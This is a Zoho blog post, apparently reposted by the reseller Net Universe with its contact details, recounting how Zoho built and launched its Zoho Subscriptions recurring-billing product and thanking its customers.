Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/google.
You can visit our Shop Online

Zoho Subscriptions and Zoho’s Subscriptions

Zoho Subscriptions turned 6 recently, but we’ve been offering subscription-based products for much longer than that. So we thought this would be a good time to look back at how Zoho Subscriptions was born and take a moment to thank our customers for sticking with us.

Pioneering the model

Zoho has been offering subscription-based products for the better part of two decades now, starting when we first launched Zoho CRM in 2005.

The idea behind it was simple: offer customers a flexible way to pay for quality products, without making them feel like they’re tied down to a long-term contract.

As Zoho branched out and offered more products, the subscription model proved to be a success. We found ourselves one of very few companies offering cloud services with a broad product portfolio and an entirely subscription-based model.

As our volume of customers grew, we came to realize that our existing method of managing customers’ subscriptions couldn’t keep up. We needed a tool that could handle the complexities of recurring billing and subscription management at scale. Something that could cope with the varied pricing models of our multiple products, and something that could play well with our existing systems.

Build vs. buy

It’s a classic question that every organization faces at some point. Do you set aside the resources to build your own solution, including a budget, work hours, and a dedicated team? Or do you skip the hassle and buy a pre-made solution instead?

There’s not always a simple answer to that question. If you choose to build, you run the risk of spending a lot of resources on a system that couldn’t deliver. If you choose to buy, you pay someone else to do the work of creating your solution…but the burden is on you to pick one that does what you need it to do.

At Zoho, we’re committed to solving this problem for both sides. That’s why we don’t make anything we don’t want to use ourselves. We use our own products, like Zoho Books for our accounting, Zoho People for HR management, and Zoho Cliq for internal communications–just to name a few.

So, following our usual strategy, we decided to build our own subscription management system. It just so happened that we had a decade’s worth of experience in the subscription industry to help us do so.

By 2013, Zoho was offering more than 20 products with a subscription-based pricing model. This gave us real-world experience of what was needed in a subscription management tool. We were all too familiar with pain points like add-on management, tier-based pricing, and consolidated reporting, and we wanted to solve them–for ourselves and for other businesses.

Our (and your) very own recurring billing tool

In 2014, we put that experience to good use and launched Zoho Subscriptions to help other businesses adopt a subscription-based model for themselves. At that time, the subscription industry boom was right around the corner and major players like Adobe were switching to a subscription-based model.

We built Zoho Subscriptions to be scalable, from its set-and-forget simplicity to its open REST APIs. We wanted it to work seamlessly with our existing upstream systems like Zoho CRM and downstream systems like Zoho Books, so this functionality was baked in. We didn’t stop there though, we wanted Zoho Subscriptions to work out of the box for other businesses too, so we made sure it came with prebuilt integrations that make it easy for you to connect with payment gateways and other integrations to communicate with your existing systems.

This means smaller business without dedicated development teams can configure Zoho Subscriptions with a no-code approach and larger business with their own resources can use Zoho Subscriptions’ APIs to integrate tightly with their own applications.

All of this customization came out of our realization that every business needs to make their subscription management software truly their own, whether they build or buy. When you can make your tools work exactly the way you need them to, build vs. buy doesn’t have to be a tough decision. Zoho Subscriptions can help you out.

Our commitment to customers

If you’ve been using Zoho Subscriptions, thank you! We wouldn’t be where we are right now without your support, and we’re committed to continuing to provide you with more great features that scale. Our team is hard at work to bring you the best subscription management experience, so you can look forward to major updates in the coming year.

As your business grows, Zoho Subscriptions will be right there with you.

We’d love to hear from you! Drop a comment below and let us know what you think about recurring billing and Zoho Subscriptions.

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.